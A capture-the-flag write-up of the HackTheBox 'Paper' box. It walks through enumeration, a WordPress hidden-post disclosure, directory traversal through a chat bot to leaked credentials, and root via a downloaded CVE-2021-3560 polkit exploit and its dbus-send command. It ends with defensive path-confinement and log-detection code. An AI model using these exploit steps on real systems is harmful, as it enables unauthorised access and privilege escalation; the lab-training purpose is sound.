---
search:
  exclude: true
---

# Paper Writeup

![](img/65.png)

## Introduction

Paper is an easy box released back in February 2022.

## **Part 1 : Initial Enumeration**

As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.

```
[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ sudo vim /etc/hosts
[sudo] password for nothing:

[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ ping paper.htb
PING paper.htb (10.129.136.31) 56(84) bytes of data.
64 bytes from paper.htb (10.129.136.31): icmp_seq=1 ttl=63 time=24.9 ms
^C
--- paper.htb ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 24.883/24.883/24.883/0.000 ms

[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ nmap -sCV paper.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-30 20:21 CEST
Nmap scan report for paper.htb (10.129.136.31)
Host is up (0.028s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods:
|_  Potentially risky methods: TRACE
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-title: HTTP Server Test Page powered by CentOS
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods:
|_  Potentially risky methods: TRACE
| tls-alpn:
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after:  2022-07-08T10:32:34
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.78 seconds
```

## **Part 2 : Getting User Access**

Our nmap scan picked up port 80 running Apache 2.4.37, most likely on CentOS. When we curl port 80 we see that the response carries another domain in the X-Backend-Server header:

```
[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ curl -v http://paper.htb
*   Trying 10.129.136.31:80...
* Connected to paper.htb (10.129.136.31) port 80 (#0)
> GET / HTTP/1.1
> Host: paper.htb
> User-Agent: curl/7.84.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 403 Forbidden
< Date: Tue, 30 Aug 2022 18:31:07 GMT
< Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
< X-Backend-Server: office.paper
< Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT
< ETag: "30c0b-5c5c7fdeec240"
< Accept-Ranges: bytes
< Content-Length: 199691
< Content-Type: text/html; charset=UTF-8
```

So we add the domain office.paper to our /etc/hosts file:

```
[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ sudo vim /etc/hosts
[sudo] password for nothing:

[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ cat /etc/hosts | grep paper
10.129.136.31 paper.htb office.paper

[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ ping office.paper
PING paper.htb (10.129.136.31) 56(84) bytes of data.
64 bytes from paper.htb (10.129.136.31): icmp_seq=1 ttl=63 time=23.2 ms
64 bytes from paper.htb (10.129.136.31): icmp_seq=2 ttl=63 time=23.0 ms
```

Let's enumerate for other subdomains using wfuzz (we specify the wordlist we want to use and hide responses with a 403 status code):

```
[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ wfuzz -u http://office.paper -H "Host: FUZZ.office.paper" -w /bedrock/strata/kali/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hc 403
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://office.paper/
Total requests: 4989

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000070:   200        507 L    13015 W    223163 Ch   "chat"
^C
/usr/lib/python3.10/site-packages/wfuzz/wfuzz.py:79: UserWarning:Finishing pending requests...

Total time: 5.887163
Processed Requests: 192
Filtered Requests: 191
Requests/sec.: 32.61332
```

wfuzz found the chat.office.paper subdomain, so let's also add it to our /etc/hosts file and then browse to it:

![](prg/65_001.png)

Here we find a Rocket.Chat instance. Let's come back to it once we have credentials. We move on back to the http site on office.paper:

![](prg/65_002.png)

![](prg/65_003.png)

Browsing to **http://office.paper/wp-admin** reveals that it is a WordPress site.
So we run wpscan:

```
[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ wpscan --url http://office.paper
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://office.paper/ [10.129.136.31]
[+] Started: Tue Aug 30 20:47:20 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
 |  - X-Powered-By: PHP/7.2.24
 |  - X-Backend-Server: office.paper
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] WordPress readme found: http://office.paper/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-05).
 | Found By: Rss Generator (Passive Detection)
 |  - http://office.paper/index.php/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>
 |  - http://office.paper/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>

[+] WordPress theme in use: construction-techup
 | Location: http://office.paper/wp-content/themes/construction-techup/
 | Last Updated: 2021-07-17T00:00:00.000Z
 | Readme: http://office.paper/wp-content/themes/construction-techup/readme.txt
 | [!] The version is out of date, the latest version is 1.4
 | Style URL: http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1
 | Style Name: Construction Techup
 | Description: Construction Techup is child theme of Techup a Free WordPress Theme useful for Business, corporate a...
 | Author: wptexture
 | Author URI: https://testerwp.com/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1, Match: 'Version: 1.1'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <=============================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Aug 30 20:47:25 2022
[+] Requests Done: 185
[+] Cached Requests: 5
[+] Data Sent: 44.421 KB
[+] Data Received: 18.75 MB
[+] Memory used: 227.438 MB
[+] Elapsed time: 00:00:04
```

The important finding is **WordPress version 5.2.3**. This version is vulnerable to CVE-2019-17671, which is basically a mistake that lets us view all the other posts, including ones that were not meant to be visible, by appending the query parameter **?static=1**:

![](prg/65_004.png)

Here a secret post reveals the secret registration link, so let's use it to create an account:

![](prg/65_005.png)

Once we log in, we can see the following info:

![](prg/65_006.png)

Basically there's a bot called recyclops that we can reach via DM to type commands:

![](prg/65_007.png)

We can list files with the command "list":

![](prg/65_008.png)

And with directory traversal we see that there is a user on the box called "dwight".
![](prg/65_009.png)

Going just one directory up we see the hubot directory containing a .env file with plaintext credentials: **recyclops/Queenofblad3s!23**, so let's check for password reuse with the user dwight:

```
[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ crackmapexec ssh office.paper -u dwight -p 'Queenofblad3s!23'
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing SMB protocol database
[*] Initializing LDAP protocol database
[*] Initializing SSH protocol database
[*] Initializing MSSQL protocol database
[*] Initializing WINRM protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
/usr/lib/python3/dist-packages/pywerview/requester.py:144: SyntaxWarning: "is not" with a literal. Did you mean "!="?
  if result['type'] is not 'searchResEntry':
SSH         paper.htb       22     office.paper     [*] SSH-2.0-OpenSSH_8.0
SSH         paper.htb       22     office.paper     [+] dwight:Queenofblad3s!23

[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ ssh dwight@office.paper
The authenticity of host 'office.paper (10.129.136.31)' can't be established.
ED25519 key fingerprint is SHA256:9utZz963ewD/13oc9IYzRXf6sUEX4xOe/iUaMPTFInQ.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'office.paper' (ED25519) to the list of known hosts.
dwight@office.paper's password:
Activate the web console with: systemctl enable --now cockpit.socket

Last login: Tue Feb  1 09:14:33 2022 from 10.10.14.23
[dwight@paper ~]$ id
uid=1004(dwight) gid=1004(dwight) groups=1004(dwight)
[dwight@paper ~]$ cat user.txt
a0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
```

And we managed to log in and get the user flag!
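The recyclops "list" command walks out of its sales folder because the path it is given is used as-is. As an added example (not code from the box or from Hubot), here is that unchecked join next to a confined version that resolves the path and refuses anything outside the allowed root; the directory layout, file names and .env contents are constructed to mirror the sales and hubot folders from the writeup.

```python
import os
import tempfile

def join_unchecked(root, user_path):
    # The flawed pattern: user input is glued onto the root, so "../" walks out.
    return os.path.join(root, user_path)

def join_confined(root, user_path):
    """Return the real path of user_path under root, or raise PermissionError."""
    root_real = os.path.realpath(root)
    if os.path.isabs(user_path) or "\0" in user_path:
        raise PermissionError("absolute paths and NUL bytes are refused")
    # realpath collapses ".." and follows symlinks, so a planted link is caught too
    target = os.path.realpath(os.path.join(root_real, user_path))
    if target != root_real and not target.startswith(root_real + os.sep):
        raise PermissionError(f"{user_path!r} resolves outside {root}")
    return target

def list_command(root, user_path="."):
    """Hardened 'list': names only, never from outside root."""
    return sorted(os.listdir(join_confined(root, user_path)))

def build_demo_tree():
    # Constructed layout: a sales folder the bot may list and a sibling hubot
    # folder holding a .env file it must never expose (placeholder content).
    base = tempfile.mkdtemp()
    sales = os.path.join(base, "sales")
    os.makedirs(os.path.join(sales, "sale"))
    os.makedirs(os.path.join(base, "hubot"))
    with open(os.path.join(base, "hubot", ".env"), "w") as f:
        f.write("ROCKETCHAT_PASSWORD=constructed-placeholder\n")
    with open(os.path.join(sales, "sale", "portfolio.txt"), "w") as f:
        f.write("constructed\n")
    # A symlink inside the allowed tree that points outside of it.
    os.symlink(os.path.join(base, "hubot"), os.path.join(sales, "link"))
    return base, sales

def demo():
    base, sales = build_demo_tree()
    results = {"top": list_command(sales), "sale": list_command(sales, "sale")}
    # The unchecked join happily produces a path to the secrets file.
    results["unchecked"] = join_unchecked(sales, "../hubot/.env").endswith("sales/../hubot/.env")
    for probe in ("../hubot", "..", "link", "/etc", "sale/../../hubot"):
        try:
            list_command(sales, probe)
            results[probe] = "allowed"
        except PermissionError:
            results[probe] = "blocked"
    return results

if __name__ == "__main__":
    print(demo())
```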
## **Part 3 : Getting Root Access**

Now, in order to privesc, let's enumerate the possible privesc paths using linpeas.sh:

```
[term1]
[dwight@paper ~]$ which wget curl
/usr/bin/wget
/usr/bin/curl

[term2]
[ 10.10.14.13/23 ] [ nowhere ] [~/HTB/Paper]
→ wget https://github.com/carlospolop/PEASS-ng/releases/download/20220828/linpeas.sh
--2022-08-30 21:12:52--  https://github.com/carlospolop/PEASS-ng/releases/download/20220828/linpeas.sh
Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
Resolving github.com (github.com)... 140.82.121.3
Connecting to github.com (github.com)|140.82.121.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/14f0a504-adb0-4d42-918e-9a222fa1ba90?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20220830%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220830T191251Z&X-Amz-Expires=300&X-Amz-Signature=9743821c11a0ac568713ac91163de2aee6d92a3462a4cfe931bf777ecbafbc1e&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream [following]
--2022-08-30 21:12:53--  https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/14f0a504-adb0-4d42-918e-9a222fa1ba90?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20220830%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220830T191251Z&X-Amz-Expires=300&X-Amz-Signature=9743821c11a0ac568713ac91163de2aee6d92a3462a4cfe931bf777ecbafbc1e&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.110.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 807205 (788K) [application/octet-stream]
Saving to: ‘linpeas.sh’

linpeas.sh          100%[===================>] 788.29K  4.40MB/s    in 0.2s

2022-08-30 21:12:53 (4.40 MB/s) - ‘linpeas.sh’ saved [807205/807205]

[ 10.10.14.13/23 ] [ nowhere ] [~/HTB/Paper]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...

[term1]
[dwight@paper ~]$ wget 10.10.14.13:9090/linpeas.sh
--2022-08-30 15:13:45--  http://10.10.14.13:9090/linpeas.sh
Connecting to 10.10.14.13:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 807205 (788K) [application/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh          100%[===================>] 788.29K  2.00MB/s    in 0.4s

2022-08-30 15:13:46 (2.00 MB/s) - ‘linpeas.sh’ saved [807205/807205]

[dwight@paper ~]$ chmod +x linpeas.sh
[dwight@paper ~]$ ./linpeas.sh
```

![](prg/65_010.png)

![](prg/65_011.png)

Here we see that there should be a buffer overflow vulnerability in the sudo binary, nicknamed "Baron Samedit". To check whether it is vulnerable we run **sudoedit -s /**; if it returns **sudoedit /: not a regular file** then it is vulnerable, while a patched sudo prints its usage message instead:

```
[dwight@paper ~]$ sudoedit -s /
usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ...
```
It's not vulnerable. However, linpeas.sh also picked up that the VM is vulnerable to CVE-2021-3560, so let's exploit it as follows:

```
[term1]
[ 10.10.14.13/23 ] [ nowhere ] [~/HTB/Paper]
→ wget https://raw.githubusercontent.com/curtishoughton/CVE-2021-3560/master/CVE-2021-3560.py
--2022-08-30 21:29:20--  https://raw.githubusercontent.com/curtishoughton/CVE-2021-3560/master/CVE-2021-3560.py
Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.109.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2803 (2.7K) [text/plain]
Saving to: ‘CVE-2021-3560.py’

CVE-2021-3560.py    100%[===================>]   2.74K  --.-KB/s    in 0.001s

2022-08-30 21:29:20 (4.58 MB/s) - ‘CVE-2021-3560.py’ saved [2803/2803]

[ 10.10.14.13/23 ] [ nowhere ] [~/HTB/Paper]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
10.129.136.31 - - [30/Aug/2022 21:29:45] "GET /CVE-2021-3560.py HTTP/1.1" 200 -

[term2]
[dwight@paper ~]$ wget http://10.10.14.13:9090/CVE-2021-3560.py
--2022-08-30 15:29:44--  http://10.10.14.13:9090/CVE-2021-3560.py
Connecting to 10.10.14.13:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2803 (2.7K) [text/x-python]
Saving to: ‘CVE-2021-3560.py’

CVE-2021-3560.py    100%[===================>]   2.74K  --.-KB/s    in 0s

2022-08-30 15:29:44 (123 MB/s) - ‘CVE-2021-3560.py’ saved [2803/2803]

[dwight@paper ~]$ which python python3
/usr/bin/which: no python in (/home/dwight/.local/bin:/home/dwight/bin:/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin)
/usr/bin/python3
[dwight@paper ~]$ python3 CVE-2021-3560.py
##############CVE-2021-3560##############
# __________      .__  __   .__  __      #
# \______   \____ |  | |  | _|__|/  |_   #
#  |     ___/  _ \|  | |  |/ /  \   __\  #
#  |    |  (  <_> )  |_|    <|  ||  |    #
#  |____|   \____/|____/__|_ \__||__|    #
#                           \/           #
#   Local Privilege Escalation Exploit   #
#  Author: Salman Asad (@deathflash1411) #
#########################################
[+] User created!
[+] Username: flash
[+] User ID: 1005
[!] Run the below command a few times (<10) and login via su - flash
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1005 org.freedesktop.Accounts.User.SetPassword string:'$5$HPVUSULZZ8BMl4wE$zisRakxfq9IDf7mY0FUteDiKtYYRjmGkf3RAUjFE2P2' string:GoldenEye & sleep 0.005s ; kill $!
[dwight@paper ~]$
```

So let's follow the script's instructions:

```
[dwight@paper ~]$ python3 CVE-2021-3560.py
##############CVE-2021-3560##############
[+] User created!
[+] Username: flash
[+] User ID: 1005
[!] Run the below command a few times (<10) and login via su - flash
[dwight@paper ~]$ dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1005 org.freedesktop.Accounts.User.SetPassword string:'$5$HPVUSULZZ8BMl4wE$zisRakxfq9IDf7mY0FUteDiKtYYRjmGkf3RAUjFE2P2' string:GoldenEye
[dwight@paper ~]$ su - flash
Password:
[flash@paper ~]$ id
uid=1005(flash) gid=1005(flash) groups=1005(flash),10(wheel)
[flash@paper ~]$ sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for flash:
[root@paper flash]# id
uid=0(root) gid=0(root) groups=0(root)
[root@paper flash]# cat /root/root.txt
2fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
```

And that's it! We managed to get the root flag!

## **Conclusion**

Here we can see the progress graph:

![](img/65_graph.png)
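Looking at the CVE-2021-3560 escalation from the defender's side: the new account "flash" lands in wheel and is then reached with su from dwight, with no administrator ever running useradd. As an added example (not part of the original writeup), this log review flags that pattern in /var/log/secure; the log lines, PIDs, timestamps and the admin-created "alice" account are constructed for the example.

```python
import re
from datetime import datetime, timedelta

# Constructed /var/log/secure excerpt in the syslog format CentOS 8 uses. Times,
# PIDs and the admin-created "alice" account are made up for this example.
SAMPLE_LOG = """\
Aug 30 09:00:00 paper sudo[900]:    dwight : TTY=pts/0 ; PWD=/home/dwight ; USER=root ; COMMAND=/usr/sbin/useradd -m alice
Aug 30 09:00:00 paper useradd[901]: new user: name=alice, UID=1006, GID=1006, home=/home/alice, shell=/bin/bash
Aug 30 15:31:02 paper useradd[4102]: new group: name=flash, GID=1005
Aug 30 15:31:02 paper useradd[4102]: new user: name=flash, UID=1005, GID=1005, home=/home/flash, shell=/bin/bash
Aug 30 15:31:02 paper useradd[4102]: add 'flash' to group 'wheel'
Aug 30 15:31:40 paper su[4210]: pam_unix(su-l:session): session opened for user flash by dwight(uid=1004)
"""

LINE_RE = re.compile(r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ (?P<prog>[\w.-]+)\[\d+\]: (?P<msg>.*)$")
NEW_USER_RE = re.compile(r"new user: name=(?P<name>[^,]+), UID=(?P<uid>\d+)")
WHEEL_RE = re.compile(r"add '(?P<name>[^']+)' to group 'wheel'")
SU_RE = re.compile(r"session opened for user (?P<name>\S+) by (?P<by>\w+)\(uid=(?P<uid>\d+)\)")

def parse(line):
    """Split one syslog line into (timestamp, program, message); None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # syslog stamps carry no year; strptime fills in 1900, which is fine for deltas
    return datetime.strptime(m["ts"], "%b %d %H:%M:%S"), m["prog"], m["msg"]

def find_suspicious_accounts(log_text, window=timedelta(minutes=5)):
    """Map each newly created user to the reasons it looks like a non-admin creation."""
    events = [e for e in map(parse, log_text.splitlines()) if e]
    admin_useradd = [ts for ts, prog, msg in events if prog == "sudo" and "useradd" in msg]
    wheel = {m["name"] for _, _, msg in events if (m := WHEEL_RE.search(msg))}
    su_by_unpriv = {m["name"] for _, _, msg in events
                    if (m := SU_RE.search(msg)) and m["uid"] != "0"}
    findings = {}
    for ts, prog, msg in events:
        m = NEW_USER_RE.search(msg)
        if prog != "useradd" or not m:
            continue
        name, reasons = m["name"], []
        # No sudo useradd shortly before the creation means no administrator ran it.
        if not any(timedelta(0) <= ts - t <= window for t in admin_useradd):
            reasons.append("no sudo useradd preceding creation")
        if name in wheel:
            reasons.append("added to wheel")
        if name in su_by_unpriv:
            reasons.append("su from unprivileged user")
        if reasons:
            findings[name] = reasons
    return findings

if __name__ == "__main__":
    for user, why in find_suspicious_accounts(SAMPLE_LOG).items():
        print(f"{user}: {'; '.join(why)}")
```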